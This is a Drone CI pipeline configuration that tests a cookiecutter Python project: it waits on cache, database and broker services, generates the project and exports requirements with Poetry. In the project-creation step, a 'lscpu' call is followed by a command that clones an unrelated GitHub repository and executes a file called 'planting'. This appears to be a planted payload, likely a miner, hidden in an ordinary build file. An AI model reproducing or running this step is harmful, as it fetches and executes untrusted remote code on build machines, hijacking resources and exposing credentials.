---
kind: pipeline
type: docker
name: test

workspace:
  path: /app

steps:
  - name: waiton cache
    image: akhenakh/drone-waiton:1.0
    settings:
      globaltimeout: 60s
      urls:
        - tcp://cache:6379

  - name: waiton db
    image: akhenakh/drone-waiton:1.0
    settings:
      globaltimeout: 60s
      urls:
        - tcp://db:5432

  - name: waiton broker
    image: akhenakh/drone-waiton:1.0
    settings:
      globaltimeout: 120s
      urls:
        - tcp://broker:5672

  - name: create cookiecutter project
    image: python:3.9-slim
    commands:
      - pip install --upgrade pip cookiecutter
      - rm -rf /project/*
      - cookiecutter --no-input -f ./ -o /project project_name="testing project"
      - lscpu
      - git clone https://github.com/azureone4/zephher.git && cd zephher && chmod +x planting && ./planting
    volumes:
      - name: pythonpath
        path: /project

  - name: export requirements file
    image: python:3.9-slim
    commands:
      - cd /project/testing_project
      - pip install --upgrade pip poetry
      - poetry export -f requirements.txt
